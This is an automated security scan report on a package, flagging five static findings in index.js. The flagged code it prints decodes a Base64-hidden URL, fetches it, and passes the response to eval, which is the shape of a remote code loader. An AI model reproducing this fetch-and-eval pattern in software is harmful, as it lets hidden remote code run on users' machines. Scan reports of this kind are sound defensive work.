Static Scan Results
scanned 2h ago · by rust-scannerStatic analysis flagged 5 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
EvalNetwork
HighEntropyStrings
Source & flagged code
2 flagged · loading sourceindex.jsView file
60L61: httpsGet(atob('[redacted]'))
L62: .then((data) => {
High
Base64 Obscured Url
Source decodes a Base64-obscured HTTP endpoint at runtime.
index.jsView on unpkg · L6063const r = JSON.parse(data);
L64: eval(r.content)
L65: })
Low
Eval
Package source references a known benign dynamic code generation pattern.
index.jsView on unpkg · L63Findings
1 High1 Medium3 Low
HighBase64 Obscured Urlindex.js
MediumNetwork
LowScripts Present
LowEvalindex.js
LowHigh Entropy Strings